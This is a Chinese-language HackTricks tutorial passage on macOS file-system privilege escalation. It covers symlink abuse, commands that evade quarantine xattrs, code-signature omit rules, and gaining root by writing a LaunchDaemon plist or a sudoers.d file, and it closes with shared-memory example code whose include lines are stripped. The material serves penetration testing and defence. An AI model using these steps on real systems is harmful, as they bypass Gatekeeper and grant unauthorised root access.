从零开始学习 AWS 黑客技术,成为专家 ! 支持 HackTricks 的其他方式:
如果您想看到您的公司在 HackTricks 中做广告 或下载 PDF 版的 HackTricks ,请查看
加入 💬 Twitter 🐦 关注 我们。
通过向 分享您的黑客技巧 。
POSIX 权限组合
目录 中的权限:
写入 - 您可以删除/写入 目录中的文件 ,并且您可以删除空文件夹 。
但是,除非您对其具有写入权限,否则无法删除/修改非空文件夹 。
执行 - 您被允许遍历 目录 - 如果您没有此权限,您将无法访问其中的任何文件,或任何子目录中的文件。
危险组合
如何覆盖 root 拥有的文件/文件夹 ,但:
路径中的一个父目录所有者 是具有写入访问权限 的用户组
使用上述任何组合,攻击者可以注入 一个符号链接/硬链接 到预期路径,以获取特权任意写入。
文件夹根目录 R+X 特殊情况
如果目录 中有只有 root 具有 R+X 访问权限 的文件,那些文件对其他人不可访问 。因此,如果存在一个漏洞允许移动一个用户可读的文件 (由于该限制 而无法读取),从该目录到另一个目录 ,则可能被滥用以读取这些文件。
符号链接 / 硬链接
如果一个特权进程正在写入文件 ,该文件可能被低权限用户控制 ,或者可能是由低权限用户先前创建 的。用户只需通过符号链接或硬链接将其指向另一个文件 ,特权进程将写入该文件。
请查看其他部分,攻击者可能滥用任意写入以提升权限 。
.fileloc
具有**.fileloc**扩展名的文件可以指向其他应用程序或二进制文件,因此当打开它们时,将执行该应用程序/二进制文件。
示例:
复制 <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>URL</key>
<string>file:///System/Applications/Calculator.app</string>
<key>URLPrefix</key>
<integer>0</integer>
</dict>
</plist> 任意FD
如果你可以让一个进程以高权限打开文件或文件夹 ,你可以滥用**crontab来打开 /etc/sudoers.d 中的文件,使用 EDITOR=exploit.py**,这样exploit.py将获得/etc/sudoers中文件的FD并滥用它。
避免隔离xattrs技巧
删除它
复制 xattr -d com.apple.quarantine /path/to/file_or_app uchg / uchange / uimmutable标志
如果文件/文件夹具有此不可变属性,则无法在其上放置xattr
复制 echo asd > /tmp/asd
chflags uchg /tmp/asd # "chflags uchange /tmp/asd" or "chflags uimmutable /tmp/asd"
xattr -w com.apple.quarantine "" /tmp/asd
xattr: [Errno 1] Operation not permitted: '/tmp/asd'
ls -lO /tmp/asd
# check the "uchg" in the output defvfs挂载
复制 mkdir /tmp/mnt
mount_devfs -o noowners none "/tmp/mnt"
chmod 777 /tmp/mnt
mkdir /tmp/mnt/lol
xattr -w com.apple.quarantine "" /tmp/mnt/lol
xattr: [Errno 1] Operation not permitted: '/tmp/mnt/lol' writeextattr ACL
此 ACL 阻止向文件添加 xattrs。
复制 rm -rf /tmp/test*
echo test >/tmp/test
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test
ls -le /tmp/test
ditto -c -k test test.zip
# Download the zip from the browser and decompress it, the file should be without a quarantine xattr
cd /tmp
echo y | rm test
# Decompress it with ditto
ditto -x -k --rsrc test.zip .
ls -le /tmp/test
# Decompress it with open (if sandboxed decompressed files go to the Downloads folder)
open test.zip
sleep 1
ls -le /tmp/test com.apple.acl.text xattr + AppleDouble
AppleDouble 文件格式会复制文件及其ACEs。
要复制这一过程,首先需要获取正确的acl字符串:
复制 # Everything will be happening here
mkdir /tmp/temp_xattrs
cd /tmp/temp_xattrs
# Create a folder and a file with the acls and xattr
mkdir del
mkdir del/test_fold
echo test > del/test_fold/test_file
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold/test_file
ditto -c -k del test.zip
# uncomporess to get it back
ditto -x -k --rsrc test.zip .
ls -le test (Note that even if this works the sandbox write the quarantine xattr before)
并不是真的需要,但我还是留着以防万一:
绕过代码签名
Bundle 包含文件 _CodeSignature/CodeResources bundle 中每个 文件 的 哈希值 。请注意,CodeResources 的哈希值也被嵌入在可执行文件中 ,因此我们无法对其进行更改。
然而,有一些文件的签名不会被检查,这些文件在属性列表中具有省略键,如:
复制 <dict>
...
<key>rules</key>
<dict>
...
<key>^Resources/.*\.lproj/locversion.plist$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>1100</real>
</dict>
...
</dict>
<key>rules2</key>
...
<key>^(.*/)?\.DS_Store$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>2000</real>
</dict>
...
<key>^PkgInfo$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>20</real>
</dict>
...
<key>^Resources/.*\.lproj/locversion.plist$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>1100</real>
</dict>
...
</dict> 可以使用以下命令行计算资源的签名:
复制 openssl dgst -binary -sha1 /System/Cryptexes/App/System/Applications/Safari.app/Contents/Resources/AppIcon.icns | openssl base64 通常 macOS 会通过与 com.apple.DiskArbitrarion.diskarbitrariond Mach 服务通信(由 /usr/libexec/diskarbitrationd 提供)来挂载磁盘。如果在 LaunchDaemons plist 文件中添加参数 -d 并重新启动,它将会将日志存储在 /var/log/diskarbitrationd.log 中。
然而,可以使用诸如 hdik 和 hdiutil 这样的工具直接与 com.apple.driver.DiskImages kext 通信。
任意写入
定期 sh 脚本
如果您的脚本可以被解释为 shell 脚本 ,则可以覆盖 /etc/periodic/daily/999.local
您可以使用以下命令伪造 执行此脚本:sudo periodic daily
守护程序
编写一个任意的 LaunchDaemon ,如 /Library/LaunchDaemons/xyz.hacktricks.privesc.plist
复制 <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.sample.Load</string>
<key>ProgramArguments</key>
<array>
<string>/Applications/Scripts/privesc.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist> Sudoers File
如果你有任意写入权限 ,你可以创建一个文件在文件夹**/etc/sudoers.d/里,授予自己 sudo**权限。
PATH files
文件**/etc/paths** 是一个主要用来设置PATH环境变量的地方。你必须是root才能覆盖它,但如果一个来自特权进程 的脚本在执行一些没有完整路径的命令 ,你也许可以通过修改这个文件来劫持 它。
你也可以在**/etc/paths.d**里写入文件来加载新的文件夹到PATH环境变量中。
生成其他用户可写文件
复制 DIRNAME=/usr/local/etc/periodic/daily
mkdir -p "$DIRNAME"
chmod +a "$(whoami) allow read,write,append,execute,readattr,writeattr,readextattr,writeextattr,chown,delete,writesecurity,readsecurity,list,search,add_file,add_subdirectory,delete_child,file_inherit,directory_inherit," "$DIRNAME"
MallocStackLogging=1 MallocStackLoggingDirectory=$DIRNAME MallocStackLoggingDontDeleteStackLogFile=1 top invalidparametername
FILENAME=$(ls "$DIRNAME")
echo $FILENAME POSIX 共享内存
POSIX 共享内存 允许 POSIX 兼容操作系统中的进程访问一个共享内存区域,相比其他进程间通信方法,可以实现更快的通信。它涉及使用 shm_open() 创建或打开一个共享内存对象,使用 ftruncate() 设置其大小,并使用 mmap() 将其映射到进程的地址空间。进程可以直接从这个内存区域读取和写入数据。为了管理并发访问并防止数据损坏,通常会使用诸如互斥锁或信号量等同步机制。最后,进程使用 munmap() 和 close() 取消映射和关闭共享内存,并可选择使用 shm_unlink() 删除内存对象。在需要多个进程快速访问共享数据的环境中,这种系统特别适用于高效快速的进程间通信。
```c // gcc producer.c -o producer -lrt #include #include #include #include #include #include
int main() { const char *name = "/my_shared_memory"; const int SIZE = 4096; // Size of the shared memory object
// Create the shared memory object int shm_fd = shm_open(name, O_CREAT | O_RDWR, 0666); if (shm_fd == -1) { perror("shm_open"); return EXIT_FAILURE; }
// Configure the size of the shared memory object if (ftruncate(shm_fd, SIZE) == -1) { perror("ftruncate"); return EXIT_FAILURE; }
// Memory map the shared memory void *ptr = mmap(0, SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, shm_fd, 0); if (ptr == MAP_FAILED) { perror("mmap"); return EXIT_FAILURE; }
// Write to the shared memory sprintf(ptr, "Hello from Producer!");
// Unmap and close, but do not unlink munmap(ptr, SIZE); close(shm_fd);
return 0; }
复制 </details>
<details>
<summary>消费者代码示例</summary>
```c
// gcc consumer.c -o consumer -lrt
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
int main() {
const char *name = "/my_shared_memory";
const int SIZE = 4096; // Size of the shared memory object
// Open the shared memory object
int shm_fd = shm_open(name, O_RDONLY, 0666);
if (shm_fd == -1) {
perror("shm_open");
return EXIT_FAILURE;
}
// Memory map the shared memory
void *ptr = mmap(0, SIZE, PROT_READ, MAP_SHARED, shm_fd, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
return EXIT_FAILURE;
}
// Read from the shared memory
printf("Consumer received: %s\n", (char *)ptr);
// Cleanup
munmap(ptr, SIZE);
close(shm_fd);
shm_unlink(name); // Optionally unlink
return 0;
}
macOS 受保护描述符
macOS 受保护描述符 是 macOS 中引入的一项安全功能,旨在增强用户应用程序中的文件描述符操作 的安全性和可靠性。这些受保护描述符提供了一种将特定限制或“保护”与文件描述符关联起来的方式,这些限制由内核强制执行。
该功能特别有助于防止某些类别的安全漏洞,如未经授权的文件访问 或竞争条件 。这些漏洞会在例如一个线程正在访问一个文件描述符时,给另一个易受攻击的线程访问权限 ,或者当一个文件描述符被易受攻击的子进程继承 时发生。与此功能相关的一些函数包括:
guarded_open_np: 使用保护打开一个文件描述符
change_fdguard_np: 更改描述符上的保护标志(甚至移除保护)
参考资料